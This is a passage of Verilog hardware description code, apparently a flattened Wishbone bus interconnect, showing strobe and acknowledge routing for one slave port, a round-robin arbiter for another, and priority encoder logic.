    always @ (  ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) or  ( ( ( m0_slv_sel == 4'd1 ) ) ? ( m0_stb_i ) : ( 1'b0 ) ) or  ( ( ( m1_slv_sel == 4'd1 ) ) ? ( m1_stb_i ) : ( 1'b0 ) ) or  ( ( ( m2_slv_sel == 4'd1 ) ) ? ( m2_stb_i ) : ( 1'b0 ) ) or  ( ( ( m3_slv_sel == 4'd1 ) ) ? ( m3_stb_i ) : ( 1'b0 ) ) or  ( ( ( m4_slv_sel == 4'd1 ) ) ? ( m4_stb_i ) : ( 1'b0 ) ) or  ( ( ( m5_slv_sel == 4'd1 ) ) ? ( m5_stb_i ) : ( 1'b0 ) ) or  ( ( ( m6_slv_sel == 4'd1 ) ) ? ( m6_stb_i ) : ( 1'b0 ) ) or  ( ( ( m7_slv_sel == 4'd1 ) ) ? ( m7_stb_i ) : ( 1'b0 ) ))
    begin
        case ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s1_wb_stb_o = ( ( ( m0_slv_sel == 4'd1 ) ) ? ( m0_stb_i ) : ( 1'b0 ) );
        end
        3'd1:
        begin
            s1_wb_stb_o = ( ( ( m1_slv_sel == 4'd1 ) ) ? ( m1_stb_i ) : ( 1'b0 ) );
        end
        3'd2:
        begin
            s1_wb_stb_o = ( ( ( m2_slv_sel == 4'd1 ) ) ? ( m2_stb_i ) : ( 1'b0 ) );
        end
        3'd3:
        begin
            s1_wb_stb_o = ( ( ( m3_slv_sel == 4'd1 ) ) ? ( m3_stb_i ) : ( 1'b0 ) );
        end
        3'd4:
        begin
            s1_wb_stb_o = ( ( ( m4_slv_sel == 4'd1 ) ) ? ( m4_stb_i ) : ( 1'b0 ) );
        end
        3'd5:
        begin
            s1_wb_stb_o = ( ( ( m5_slv_sel == 4'd1 ) ) ? ( m5_stb_i ) : ( 1'b0 ) );
        end
        3'd6:
        begin
            s1_wb_stb_o = ( ( ( m6_slv_sel == 4'd1 ) ) ? ( m6_stb_i ) : ( 1'b0 ) );
        end
        3'd7:
        begin
            s1_wb_stb_o = ( ( ( m7_slv_sel == 4'd1 ) ) ? ( m7_stb_i ) : ( 1'b0 ) );
        end
        endcase
    end
    assign s1_m0_ack_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s1_ack_i );
    assign s1_m1_ack_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s1_ack_i );
    assign s1_m2_ack_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s1_ack_i );
    assign s1_m3_ack_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s1_ack_i );
    assign s1_m4_ack_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s1_ack_i );
    assign s1_m5_ack_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s1_ack_i );
    assign s1_m6_ack_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s1_ack_i );
    assign s1_m7_ack_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s1_ack_i );
    assign s1_m0_err_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s1_err_i );
    assign s1_m1_err_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s1_err_i );
    assign s1_m2_err_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s1_err_i );
    assign s1_m3_err_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s1_err_i );
    assign s1_m4_err_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s1_err_i );
    assign s1_m5_err_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s1_err_i );
    assign s1_m6_err_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s1_err_i );
    assign s1_m7_err_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s1_err_i );
    assign s1_m0_rty_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s1_rty_i );
    assign s1_m1_rty_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s1_rty_i );
    assign s1_m2_rty_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s1_rty_i );
    assign s1_m3_rty_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s1_rty_i );
    assign s1_m4_rty_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s1_rty_i );
    assign s1_m5_rty_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s1_rty_i );
    assign s1_m6_rty_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s1_rty_i );
    assign s1_m7_rty_o = ( ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s1_rty_i );
    assign s2_wb_data_i = s2_data_i;
    assign s2_data_o = s2_wb_data_o;
    assign s2_addr_o = s2_wb_addr_o;
    assign s2_sel_o = s2_wb_sel_o;
    assign s2_we_o = s2_wb_we_o;
    assign s2_cyc_o = s2_wb_cyc_o;
    assign s2_stb_o = s2_wb_stb_o;
    assign s2_wb_ack_i = s2_ack_i;
    assign s2_wb_err_i = s2_err_i;
    assign s2_wb_rty_i = s2_rty_i;
    always @ (  posedge clk_i)
    begin
        s2_next <=  ~( s2_wb_cyc_o);
    end
    assign s2_arb_req = { m7_s2_cyc_o, m6_s2_cyc_o, m5_s2_cyc_o, m4_s2_cyc_o, m3_s2_cyc_o, m2_s2_cyc_o, m1_s2_cyc_o, m0_s2_cyc_o };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s2_arb_state <= s2_arb_grant0;
        end
        else
        begin 
            s2_arb_state <= s2_arb_next_state;
        end
    end
    always @ (  s2_arb_state or  { m7_s2_cyc_o, m6_s2_cyc_o, m5_s2_cyc_o, m4_s2_cyc_o, m3_s2_cyc_o, m2_s2_cyc_o, m1_s2_cyc_o, m0_s2_cyc_o } or  1'b0)
    begin
        s2_arb_next_state = s2_arb_state;
        case ( s2_arb_state ) 
        s2_arb_grant0:
        begin
            if (  !( s2_arb_req[0]) | 1'b0 ) 
            begin
                if ( s2_arb_req[1] ) 
                begin
                    s2_arb_next_state = s2_arb_grant1;
                end
                else
                begin 
                    if ( s2_arb_req[2] ) 
                    begin
                        s2_arb_next_state = s2_arb_grant2;
                    end
                    else
                    begin 
                        if ( s2_arb_req[3] ) 
                        begin
                            s2_arb_next_state = s2_arb_grant3;
                        end
                        else
                        begin 
                            if ( s2_arb_req[4] ) 
                            begin
                                s2_arb_next_state = s2_arb_grant4;
                            end
                            else
                            begin 
                                if ( s2_arb_req[5] ) 
                                begin
                                    s2_arb_next_state = s2_arb_grant5;
                                end
                                else
                                begin 
                                    if ( s2_arb_req[6] ) 
                                    begin
                                        s2_arb_next_state = s2_arb_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s2_arb_req[7] ) 
                                        begin
                                            s2_arb_next_state = s2_arb_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_arb_grant1:
        begin
            if (  !( s2_arb_req[1]) | 1'b0 ) 
            begin
                if ( s2_arb_req[2] ) 
                begin
                    s2_arb_next_state = s2_arb_grant2;
                end
                else
                begin 
                    if ( s2_arb_req[3] ) 
                    begin
                        s2_arb_next_state = s2_arb_grant3;
                    end
                    else
                    begin 
                        if ( s2_arb_req[4] ) 
                        begin
                            s2_arb_next_state = s2_arb_grant4;
                        end
                        else
                        begin 
                            if ( s2_arb_req[5] ) 
                            begin
                                s2_arb_next_state = s2_arb_grant5;
                            end
                            else
                            begin 
                                if ( s2_arb_req[6] ) 
                                begin
                                    s2_arb_next_state = s2_arb_grant6;
                                end
                                else
                                begin 
                                    if ( s2_arb_req[7] ) 
                                    begin
                                        s2_arb_next_state = s2_arb_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s2_arb_req[0] ) 
                                        begin
                                            s2_arb_next_state = s2_arb_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_arb_grant2:
        begin
            if (  !( s2_arb_req[2]) | 1'b0 ) 
            begin
                if ( s2_arb_req[3] ) 
                begin
                    s2_arb_next_state = s2_arb_grant3;
                end
                else
                begin 
                    if ( s2_arb_req[4] ) 
                    begin
                        s2_arb_next_state = s2_arb_grant4;
                    end
                    else
                    begin 
                        if ( s2_arb_req[5] ) 
                        begin
                            s2_arb_next_state = s2_arb_grant5;
                        end
                        else
                        begin 
                            if ( s2_arb_req[6] ) 
                            begin
                                s2_arb_next_state = s2_arb_grant6;
                            end
                            else
                            begin 
                                if ( s2_arb_req[7] ) 
                                begin
                                    s2_arb_next_state = s2_arb_grant7;
                                end
                                else
                                begin 
                                    if ( s2_arb_req[0] ) 
                                    begin
                                        s2_arb_next_state = s2_arb_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s2_arb_req[1] ) 
                                        begin
                                            s2_arb_next_state = s2_arb_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_arb_grant3:
        begin
            if (  !( s2_arb_req[3]) | 1'b0 ) 
            begin
                if ( s2_arb_req[4] ) 
                begin
                    s2_arb_next_state = s2_arb_grant4;
                end
                else
                begin 
                    if ( s2_arb_req[5] ) 
                    begin
                        s2_arb_next_state = s2_arb_grant5;
                    end
                    else
                    begin 
                        if ( s2_arb_req[6] ) 
                        begin
                            s2_arb_next_state = s2_arb_grant6;
                        end
                        else
                        begin 
                            if ( s2_arb_req[7] ) 
                            begin
                                s2_arb_next_state = s2_arb_grant7;
                            end
                            else
                            begin 
                                if ( s2_arb_req[0] ) 
                                begin
                                    s2_arb_next_state = s2_arb_grant0;
                                end
                                else
                                begin 
                                    if ( s2_arb_req[1] ) 
                                    begin
                                        s2_arb_next_state = s2_arb_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s2_arb_req[2] ) 
                                        begin
                                            s2_arb_next_state = s2_arb_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_arb_grant4:
        begin
            if (  !( s2_arb_req[4]) | 1'b0 ) 
            begin
                if ( s2_arb_req[5] ) 
                begin
                    s2_arb_next_state = s2_arb_grant5;
                end
                else
                begin 
                    if ( s2_arb_req[6] ) 
                    begin
                        s2_arb_next_state = s2_arb_grant6;
                    end
                    else
                    begin 
                        if ( s2_arb_req[7] ) 
                        begin
                            s2_arb_next_state = s2_arb_grant7;
                        end
                        else
                        begin 
                            if ( s2_arb_req[0] ) 
                            begin
                                s2_arb_next_state = s2_arb_grant0;
                            end
                            else
                            begin 
                                if ( s2_arb_req[1] ) 
                                begin
                                    s2_arb_next_state = s2_arb_grant1;
                                end
                                else
                                begin 
                                    if ( s2_arb_req[2] ) 
                                    begin
                                        s2_arb_next_state = s2_arb_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s2_arb_req[3] ) 
                                        begin
                                            s2_arb_next_state = s2_arb_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_arb_grant5:
        begin
            if (  !( s2_arb_req[5]) | 1'b0 ) 
            begin
                if ( s2_arb_req[6] ) 
                begin
                    s2_arb_next_state = s2_arb_grant6;
                end
                else
                begin 
                    if ( s2_arb_req[7] ) 
                    begin
                        s2_arb_next_state = s2_arb_grant7;
                    end
                    else
                    begin 
                        if ( s2_arb_req[0] ) 
                        begin
                            s2_arb_next_state = s2_arb_grant0;
                        end
                        else
                        begin 
                            if ( s2_arb_req[1] ) 
                            begin
                                s2_arb_next_state = s2_arb_grant1;
                            end
                            else
                            begin 
                                if ( s2_arb_req[2] ) 
                                begin
                                    s2_arb_next_state = s2_arb_grant2;
                                end
                                else
                                begin 
                                    if ( s2_arb_req[3] ) 
                                    begin
                                        s2_arb_next_state = s2_arb_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s2_arb_req[4] ) 
                                        begin
                                            s2_arb_next_state = s2_arb_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_arb_grant6:
        begin
            if (  !( s2_arb_req[6]) | 1'b0 ) 
            begin
                if ( s2_arb_req[7] ) 
                begin
                    s2_arb_next_state = s2_arb_grant7;
                end
                else
                begin 
                    if ( s2_arb_req[0] ) 
                    begin
                        s2_arb_next_state = s2_arb_grant0;
                    end
                    else
                    begin 
                        if ( s2_arb_req[1] ) 
                        begin
                            s2_arb_next_state = s2_arb_grant1;
                        end
                        else
                        begin 
                            if ( s2_arb_req[2] ) 
                            begin
                                s2_arb_next_state = s2_arb_grant2;
                            end
                            else
                            begin 
                                if ( s2_arb_req[3] ) 
                                begin
                                    s2_arb_next_state = s2_arb_grant3;
                                end
                                else
                                begin 
                                    if ( s2_arb_req[4] ) 
                                    begin
                                        s2_arb_next_state = s2_arb_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s2_arb_req[5] ) 
                                        begin
                                            s2_arb_next_state = s2_arb_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_arb_grant7:
        begin
            if (  !( s2_arb_req[7]) | 1'b0 ) 
            begin
                if ( s2_arb_req[0] ) 
                begin
                    s2_arb_next_state = s2_arb_grant0;
                end
                else
                begin 
                    if ( s2_arb_req[1] ) 
                    begin
                        s2_arb_next_state = s2_arb_grant1;
                    end
                    else
                    begin 
                        if ( s2_arb_req[2] ) 
                        begin
                            s2_arb_next_state = s2_arb_grant2;
                        end
                        else
                        begin 
                            if ( s2_arb_req[3] ) 
                            begin
                                s2_arb_next_state = s2_arb_grant3;
                            end
                            else
                            begin 
                                if ( s2_arb_req[4] ) 
                                begin
                                    s2_arb_next_state = s2_arb_grant4;
                                end
                                else
                                begin 
                                    if ( s2_arb_req[5] ) 
                                    begin
                                        s2_arb_next_state = s2_arb_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s2_arb_req[6] ) 
                                        begin
                                            s2_arb_next_state = s2_arb_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s2_msel_req = { m7_s2_cyc_o, m6_s2_cyc_o, m5_s2_cyc_o, m4_s2_cyc_o, m3_s2_cyc_o, m2_s2_cyc_o, m1_s2_cyc_o, m0_s2_cyc_o };
    assign s2_msel_pri_enc_valid = { m7_s2_cyc_o, m6_s2_cyc_o, m5_s2_cyc_o, m4_s2_cyc_o, m3_s2_cyc_o, m2_s2_cyc_o, m1_s2_cyc_o, m0_s2_cyc_o };
    always @ (  s2_msel_pri_enc_valid[0] or  { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[1] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[0] ) ) })
    begin
        if (  !( s2_msel_pri_enc_valid[0]) ) 
        begin
            s2_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[1] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[0] ) ) } == 2'h0 ) 
            begin
                s2_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[1] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[0] ) ) } == 2'h1 ) 
                begin
                    s2_msel_pri_enc_pd0_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[1] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[0] ) ) } == 2'h2 ) 
                    begin
                        s2_msel_pri_enc_pd0_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s2_msel_pri_enc_pd0_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s2_msel_pri_enc_valid[0] or  { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[1] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[0] ) ) })
    begin
        if (  !( s2_msel_pri_enc_valid[0]) ) 
        begin
            s2_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[1] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[0] ) ) } == 2'h0 ) 
            begin
                s2_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s2_msel_pri_enc_pd0_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s2_msel_pri_enc_valid[1] or  { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[3] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[2] ) ) })
    begin
        if (  !( s2_msel_pri_enc_valid[1]) ) 
        begin
            s2_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[3] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[2] ) ) } == 2'h0 ) 
            begin
                s2_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[3] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[2] ) ) } == 2'h1 ) 
                begin
                    s2_msel_pri_enc_pd1_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[3] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[2] ) ) } == 2'h2 ) 
                    begin
                        s2_msel_pri_enc_pd1_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s2_msel_pri_enc_pd1_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s2_msel_pri_enc_valid[1] or  { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[3] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[2] ) ) })
    begin
        if (  !( s2_msel_pri_enc_valid[1]) ) 
        begin
            s2_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[3] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[2] ) ) } == 2'h0 ) 
            begin
                s2_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s2_msel_pri_enc_pd1_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s2_msel_pri_enc_valid[2] or  { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[5] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[4] ) ) })
    begin
        if (  !( s2_msel_pri_enc_valid[2]) ) 
        begin
            s2_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[5] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[4] ) ) } == 2'h0 ) 
            begin
                s2_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[5] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[4] ) ) } == 2'h1 ) 
                begin
                    s2_msel_pri_enc_pd2_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[5] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[4] ) ) } == 2'h2 ) 
                    begin
                        s2_msel_pri_enc_pd2_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s2_msel_pri_enc_pd2_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s2_msel_pri_enc_valid[2] or  { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[5] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[4] ) ) })
    begin
        if (  !( s2_msel_pri_enc_valid[2]) ) 
        begin
            s2_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[5] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[4] ) ) } == 2'h0 ) 
            begin
                s2_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s2_msel_pri_enc_pd2_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s2_msel_pri_enc_valid[3] or  { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[7] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[6] ) ) })
    begin
        if (  !( s2_msel_pri_enc_valid[3]) ) 
        begin
            s2_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
        end
        else
        begin 
